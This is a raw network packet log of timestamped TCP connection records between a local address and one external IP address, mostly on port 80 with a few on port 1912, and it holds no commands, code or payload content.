                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.413546085 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.415026903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.415235996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.415349960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.416774035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.416831970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.416965961 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.418235064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.418350935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.418481112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.419862032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.419996977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.420145988 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.421458960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.421508074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.421639919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.423238039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.423350096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.423480034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.424782038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.424916029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.425615072 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.426326036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.426388979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.429589033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.441010952 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.490972042 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.497685909 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.532793045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.532881975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.533013105 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.533339024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.533818007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.533955097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.534728050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.534828901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.534933090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.535887003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.536067009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.536176920 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.537194967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.537317991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.537410975 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.538710117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.538784027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.538885117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.539895058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.540052891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.540160894 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.541177988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.541331053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.541452885 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.542494059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.542567015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.542733908 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.543921947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.543997049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.544321060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.545105934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.545190096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.545296907 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.546288013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.546359062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.546487093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.547689915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.547784090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.548059940 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.548788071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.548937082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.549129009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.550070047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.550164938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.550265074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.551325083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.551388025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.551485062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.552532911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.552623034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.552715063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.553769112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.553873062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.554029942 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.554946899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.555123091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.555259943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.556119919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.556257963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.556364059 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.557291985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.557470083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.557786942 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.558512926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.558583021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.558722973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.559689999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.559768915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.559906006 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.560923100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.560982943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.561139107 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.562187910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.562328100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.562484026 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.563385963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.563411951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.563548088 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.564526081 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.564651012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.564758062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.565788984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.565897942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.566040039 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.567044973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.567209005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.567869902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.568181038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.568248034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.568408966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.569418907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.569616079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.569741964 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.570807934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.570874929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.571005106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.571753979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.571846008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.572097063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.573075056 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.573122978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.573266983 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.574168921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.574412107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.574507952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.575491905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.575685978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.576014042 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.576873064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.577037096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.577147007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.577935934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.578052044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.578192949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.579045057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.579104900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.579385042 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.580411911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.580605030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.580929995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.581437111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.581492901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.581650019 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.582622051 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.582986116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.583091974 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.583808899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.583822966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.583934069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.585002899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.585104942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.585220098 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.586196899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.586400986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.586508036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.587384939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.587486982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.587680101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.588727951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.588829041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.589240074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.589834929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.589878082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.589967966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.591027975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.591255903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.591351032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.592199087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.592318058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.592418909 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.593427896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.593847990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.593971968 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.594644070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.594755888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.594950914 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.595902920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.596057892 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.596162081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.597023010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.619472027 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.709762096 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.724819899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.724936008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.725159883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.725320101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.725538969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.725701094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.726453066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.726521015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.726674080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.727699041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.727786064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.727912903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.728679895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.728799105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.728933096 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.729774952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.729971886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.730098963 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.730911970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.731102943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.731239080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.732008934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.732127905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.732239008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.733123064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.733247995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.733381033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.734574080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.734698057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.734812021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.735625029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.735685110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.735819101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.736546993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.736680984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.736812115 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.737612009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.737715960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.737823963 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.738822937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.738903999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.739126921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.739861012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.740163088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.740267038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.740988016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.741077900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.741224051 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.742253065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.742336035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.742542982 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.743324041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.743479967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.743587017 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.744327068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.744415045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.744689941 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.745459080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.745830059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.745955944 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.746537924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.746653080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.746764898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.747685909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.747742891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.747875929 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.748776913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.748861074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.748991013 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.749928951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.750009060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.750149965 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.751034021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.751163006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.751302958 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.752382040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:33.752542973 CET8049738176.111.174.140192.168.2.4
